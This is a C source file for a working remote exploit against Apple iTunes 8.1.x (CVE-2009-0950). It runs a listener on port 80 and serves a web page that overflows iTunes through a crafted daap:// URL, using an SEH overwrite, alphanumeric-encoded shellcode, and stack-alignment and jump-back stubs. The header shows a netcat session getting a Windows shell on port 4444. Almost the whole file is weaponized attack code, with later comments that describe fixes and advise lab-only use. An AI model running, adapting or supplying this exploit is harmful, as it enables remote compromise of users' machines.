# Title : Apple iTunes 8.1.x (daap) Buffer overflow remote exploit (CVE-2009-0950)
# Published : 2010-01-14
# Author : Simo36
/* iTunes-CVE09-s36.c
*
* Apple iTunes 8.1.x (daap) Buffer overflow remote exploit (CVE-2009-0950)
*
* Coded By :
* .:: [ Simo36 ] ::.
*
* Contact : Overflows@hotmail.com
* His0k4.hlm@gmail.com
*
* Home : www.sec-r1z.com
*
* Tested on : Win XP SP/SP3 French, Win2k Pro SP4 English
*
* Thanks To : Ryujin & Stack & r1z
*
* Finally, thanks to ryujin for the printable shellcode and the jump-back stub.
*
*----------------------------------------------------------
* C:\Documents and Settings\Administrateur\Bureau\exploit>iTunes-CVE09-s36.exe
*
* [+] Apple iTunes 8.1.x Buffer overflow remote exploit CVE-2009-0950
*
* [+] By : Simo36 & His0k4 ( Overflows@hotmail.com )
*
* [+] Home : www.sec-r1z.com
* [+] Listen on port 80
*
* [+] Connection accepted from 127.0.0.1:1097
*
* [x] Sendin welcome information....Done
*
* [+] sending the evil packet ...[+] Done !
*
* [+] check port 4444 with netcat
*
* [+] Connection Closed
*
*
*
*----------------------------------------------------------------
* C:\Documents and Settings\Administrateur\Bureau\exploit>nc -v 196.217.232.130 4444
* sweet-9fc9abcd4 [196.217.232.130] 4444 (?) open
* Windows XP Sweet 5.1 [SP3 v5.1.2600]
*(C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Program Files\Mozilla Firefox>
*
*
*
*
*
*
* Note : A plain return-address overwrite does not work here because the
* vulnerable code is built with /GS (stack cookies); the exploit goes through
* the exception handler chain instead (the ownSeh() step of the generated page).
*
* Compiler : Dev-C++ & mingw
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
/* Byte length of the crafted daap:// URL (url2) assembled in main(): its last
 * byte is written at index 2036, so a buffer that also holds the C string
 * terminator needs one byte more than this. */
#define Max_BUFF 2037
/* TCP port the exploit page is served on. The response is a bare "200" line
 * followed by the page, not a well-formed HTTP response. */
#define PORT 80
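/* Page prologue. Opens the document and the script block, defines
 * openiTunes() (navigates to an itms:// URL, which the browser hands to the
 * registered iTunes protocol handler) and starts prepareStack(), whose
 * itms:// argument (url1 in main) is appended directly after this string.
 * Fix: the "\n" escapes had been stripped, leaving bare 'n' characters that
 * break both the HTML and the JavaScript. */
char header1[]=
"<html>\n"
" <head><title>iTunes Remote Exploit</title>\n"
" <script>\n"
" function openiTunes(){document.location.assign('itms://itunes.apple.com/');}\n"
" function prepareStack(){document.location.assign('";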
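/* Closes prepareStack() and opens ownSeh(); the crafted daap:// URL (url2 in
 * main) is appended directly after this string. Fix: restored the "\n" escape
 * that had been stripped to a bare 'n'. */
char header2[]=
"');}\n function ownSeh(){document.location.assign('";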
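/* Closes ownSeh() and adds the driver code: ipwn() calls prepareStack() and
 * then ownSeh() back to back; main() calls openiTunes() and schedules ipwn()
 * 20000 ms later (presumably to give iTunes time to start). Fix: restored the
 * "\n" escapes that had been stripped to bare 'n' characters, which made the
 * script a syntax error. */
char header3[]=
"');}\n function ipwn(){\n"
" prepareStack();\n ownSeh();\n }"
"\n function main() {\n openiTunes(); \n"
" setTimeout('ipwn()',20000);\n }\n";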
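/* Rest of the page: closes the script block and prints the banner text.
 * The markup opens <html> and <body onload='main();'> twice; that is kept as
 * the original author wrote it (the author states it only works from
 * Firefox). Fix: restored the "\n" escapes that had been stripped to bare
 * 'n' characters (e.g. "Matteon" for "Matteo\n"). */
char header4[]=
" </script>\n"
" </head>\n"
"<body onload='main();'>\n"
"<html>\n"
"<head>\n"
" <title></title>\n"
"</head>\n"
"<body style='color: rgb(0, 0, 0);' onload='main();'\n"
" alink='#ee0000' link='#0000ee' vlink='#551a8b'>\n"
"<p align='center'><b>Apple iTunes 8.1.1.10 (daap)\n"
"BOF remote exploit </b></p>\n"
"<p align='center'><a\n"
" href='http://dvlabs.tippingpoint.com/advisory/TPTI-09-03'><b>\n"
"CVE-2009-0950</b></a>\n"
"</p>\n"
"<p align='center'><span style='font-weight: bold;'>Exploited\n"
"by : Simo36 { Overflows [AT] Hotmail [DOT] com }</span></p>\n"
"<p align='center'><span style='font-weight: bold;'></span></p>\n"
"<p align='center'><b>www.sec-r1z.com</b></p>\n"
"<p align='center'>based on the code found by Matteo\n"
"Memelli <br>\n"
"</p>\n"
"<h2 align='center'><b><u>This exploit works if\n"
"opened from Firefox only!</u></b>\n"
"</h2>\n"
"<p align='center'>\n"
"After exploitation iTunes crashes, you need to kill it from TaskManager\n"
"<br>\n"
"have fun!</p>\n"
"<p align='center'><br>\n"
"</p>\n"
"<p></p>\n"
"</body>\n"
"</html>\n";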
// Printable (alphanumeric-encoded) shellcode that is reached "via EDX": the
// align_stack stub below is meant to leave EDX pointing into this buffer
// before the decoder runs (presumably so the decoder can find itself -- not
// verified here). The daap:// URL layout in main() reserves exactly 730 bytes
// for it (offset 496 up to 1226), so its length must not change.
// According to the transcript in the file header it yields a shell on TCP
// 4444; the encoded bytes are not disassembled or verified here.
// WARNING: this is live attacker payload -- only run it in an isolated lab.
unsigned char shellcode[]=
"VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA";
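// ASCII-printable jump-back stub (alpha2-encoded), 63 bytes. main() places it
// at offset 1812 of the daap:// URL and expects it to end exactly at 1875.
// The leading bytes are plain x86: 0x55 push ebp, 0x59 pop ecx, six 0x43 inc
// ebx, ten 0x49 dec ecx -- presumably adjusting ECX before the decoded jump
// (not verified here); the rest is the alpha2 decoder prefix.
// Fix: the "\x" escapes had been stripped, turning each byte into the three
// literal characters "x55", "x59", ... and tripling the stub's length.
char jump_code[]= "\x55\x59\x43\x43\x43\x43\x43\x43\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x5a\x49\x45\x35\x6a\x5a\x4b\x4f\x4b\x4f\x41";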
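// Stack-alignment stub that gets a stack pointer into EDX and bumps it,
// 63 bytes, all printable: 45 x 0x61 'a' (popad), 0x54 'T' (push esp),
// 0x5a 'Z' (pop edx), 6 x 0x42 'B' (inc edx), 10 x 0x56 'V' (push esi).
// main() places it at offset 433 of the daap:// URL and expects it to end
// exactly at 496, where the shellcode starts.
// Fix: the "\x" escapes had been stripped, turning each byte into the three
// literal characters "x61", "x54", ... and tripling the stub's length.
char align_stack[]= "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x54\x5a\x42\x42\x42\x42\x42\x42\x56\x56\x56\x56\x56\x56\x56"
"\x56\x56\x56";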
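/*
 * Copy `len` bytes of `src` into url[off .. off+len) and report when the
 * chunk does not end exactly at `next`, the hard-coded offset of the chunk
 * that follows it. Every offset in the daap:// URL is absolute, so a chunk
 * of the wrong length is silently overwritten or leaves a gap.
 *
 * Returns 0 on success, -1 (nothing copied) if the chunk would overrun the
 * buffer of `url_size` bytes.
 */
static int put_chunk(char *url, size_t url_size, size_t off,
                     const char *src, size_t len, size_t next,
                     const char *what)
{
    if (len > url_size || off > url_size - len) {
        printf("[-] %s (%u bytes) does not fit at offset %u\n",
               what, (unsigned)len, (unsigned)off);
        return -1;
    }
    memcpy(url + off, src, len);
    if (off + len != next) {
        printf("[!] %s is %u bytes but the layout expects %u -- "
               "the next chunk will overwrite it or leave a gap\n",
               what, (unsigned)len, (unsigned)(next - off));
    }
    return 0;
}

/*
 * Entry point. One-shot listener on 0.0.0.0:PORT: the first client to
 * connect is sent a bare "200" line, then the exploit page (header1..header4
 * with the two crafted URLs spliced in); the connection is closed and the
 * program exits. The original looped on accept() but exit(0)'d after the
 * first client, which is the behaviour kept here.
 *
 * WARNING: the page carries a weaponized payload and is served to anyone
 * who can reach the port -- run this only on an isolated lab network.
 *
 * Fixes over the original: stripped "\n"/"\t"/"\x" escapes restored;
 * memset(buf, c, strlen(buf)) on uninitialised buffers (UB) replaced by
 * sizeof; url2 was one byte too small for its terminator (the last 'C' is
 * written at index 2036 and strcpy put the NUL at 2037); recv() results
 * are checked before being used as an index; bind()/listen()/accept()
 * results are checked; `return;` in an int function; sleep() -> Sleep();
 * sockets are closed and WSACleanup() actually runs.
 *
 * Returns 0 once the page was delivered, 1 on any error.
 */
int main(void){
    struct sockaddr_in server, client;
    WSADATA wsa;
    SOCKET sock1 = INVALID_SOCKET, sock2 = INVALID_SOCKET;
    int addrlen, got, len, rc = 1;
    char sdinfo[] = "200\n\r";      /* pseudo status line; not a real HTTP response */
    char szRecvBuff[0x100];
    char url1[210];                  /* "itms://:" + 200 x 'B' + "/" + NUL */
    char url2[Max_BUFF + 1];         /* 2037 payload bytes + NUL */
    char payload[7000];

    system("cls");                   /* cosmetic; fixed command, no external input */
    printf("\n[+] Apple iTunes 8.1.x Buffer overflow remote exploit CVE-2009-0950\n\n");
    printf("[+] By : \t\tSimo36 & His0k4 ( Overflows@hotmail.com ) \n\n");
    printf("[+] Home :\t\t www.sec-r1z.com\n");

    if (WSAStartup(MAKEWORD(1, 1), &wsa) != 0) {
        printf("[-] WSAStartup error:%d\n", WSAGetLastError());
        return 1;
    }

    /* ---- first URL (prepareStack): itms://: followed by 200 'B' and "/" ---- */
    memset(url1, 0x42, sizeof url1);
    memcpy(url1, "itms://:", 8);
    url1[sizeof url1 - 2] = '/';
    url1[sizeof url1 - 1] = '\0';

    /* ---- second URL (ownSeh): daap://: with the overflow layout ----
     * Offsets are absolute; see put_chunk() for the length checks.
     *    0  "daap://:"
     *    8  425 x 'A'
     *  433  align_stack (63 bytes)
     *  496  shellcode   (730 bytes)
     * 1226  570 x 'A'
     * 1796  "\x61\x45\x45\x45"
     * 1800  "\x2a\x5e\x21\x67"   4-byte value credited to ryujin (its role is
     *                            not documented in the original -- do not change)
     * 1804  "DEEEEEEE"
     * 1812  jump_code   (63 bytes)
     * 1875  161 x 'C'
     * 2036  'C'                   last byte, so the string is Max_BUFF long */
    memset(url2, 0x41, sizeof url2);
    memcpy(url2, "daap://:", 8);
    if (put_chunk(url2, sizeof url2, 433, align_stack, strlen(align_stack), 496, "align_stack") != 0)
        goto cleanup;
    if (put_chunk(url2, sizeof url2, 496, (const char *)shellcode,
                  strlen((const char *)shellcode), 1226, "shellcode") != 0)
        goto cleanup;
    memset(&url2[1226], 0x41, 570);
    memcpy(&url2[1796], "\x61\x45\x45\x45", 4);
    memcpy(&url2[1800], "\x2a\x5e\x21\x67", 4);   /* Thanks Riyujin for this */
    memcpy(&url2[1804], "DEEEEEEE", 8);
    if (put_chunk(url2, sizeof url2, 1812, jump_code, strlen(jump_code), 1875, "jump_code") != 0)
        goto cleanup;
    memset(&url2[1875], 0x43, 161);
    url2[2036] = 'C';
    url2[Max_BUFF] = '\0';

    /* ---- the page: header1 url1 header2 url2 header3 header4 ---- */
    len = snprintf(payload, sizeof payload, "%s%s%s%s%s%s",
                   header1, url1, header2, url2, header3, header4);
    if (len < 0 || (size_t)len >= sizeof payload) {
        printf("[-] exploit page does not fit in the payload buffer\n");
        goto cleanup;
    }

    /* ---- listen and serve exactly one client ---- */
    sock1 = socket(AF_INET, SOCK_STREAM, 0);
    if (sock1 == INVALID_SOCKET) {
        printf("[-] socket error:%d\n", WSAGetLastError());
        goto cleanup;
    }
    memset(&server, 0, sizeof server);
    server.sin_family = AF_INET;
    server.sin_port = htons(PORT);
    server.sin_addr.s_addr = INADDR_ANY;     /* all interfaces: anyone reaching the port is served */
    if (bind(sock1, (struct sockaddr *)&server, sizeof server) == SOCKET_ERROR) {
        printf("[-] bind error:%d (port %d busy or not permitted?)\n", WSAGetLastError(), PORT);
        goto cleanup;
    }
    if (listen(sock1, 100) == SOCKET_ERROR) {
        printf("[-] listen error:%d\n", WSAGetLastError());
        goto cleanup;
    }
    printf("[+] Listen on port %d \n\n", PORT);

    addrlen = sizeof client;
    sock2 = accept(sock1, (struct sockaddr *)&client, &addrlen);
    if (sock2 == INVALID_SOCKET) {
        printf("[-] accept error:%d\n", WSAGetLastError());
        goto cleanup;
    }
    printf("[+] Connection accepted from %s:%d\n\n",
           inet_ntoa(client.sin_addr), ntohs(client.sin_port));

    printf("[x] Sendin welcome information....");
    if (send(sock2, sdinfo, (int)strlen(sdinfo), 0) == SOCKET_ERROR) {
        printf("Error\n");
        goto cleanup;
    }
    Sleep(1000);
    printf("Done\n");

    /* Drain (part of) the client's request; it is never parsed. A failed or
     * empty read means the client is gone, so there is nobody to serve. */
    got = recv(sock2, szRecvBuff, (int)sizeof szRecvBuff - 1, 0);
    if (got <= 0) {
        printf("[-] client closed the connection before sending a request\n");
        goto cleanup;
    }
    szRecvBuff[got] = '\0';

    printf("\n[+] sending the evil packet ...");
    if (send(sock2, payload, len, 0) == SOCKET_ERROR) {
        printf("[-] Error on sending payload !");
        goto cleanup;
    }
    /* NOTE(review): this read blocks until the client sends more data or
     * closes. The transcript in the file header shows it working with
     * Firefox; a client that waits for us to close first would stall here. */
    (void)recv(sock2, szRecvBuff, (int)sizeof szRecvBuff - 1, 0);
    Sleep(100);
    closesocket(sock2);
    sock2 = INVALID_SOCKET;
    printf("[+] Done ! \n\n");
    printf("[+] check port 4444 with netcat \n\n");
    printf("[+] Connection Closed\n\n");
    rc = 0;

cleanup:
    if (sock2 != INVALID_SOCKET)
        closesocket(sock2);
    if (sock1 != INVALID_SOCKET)
        closesocket(sock1);
    WSACleanup();
    return rc;
}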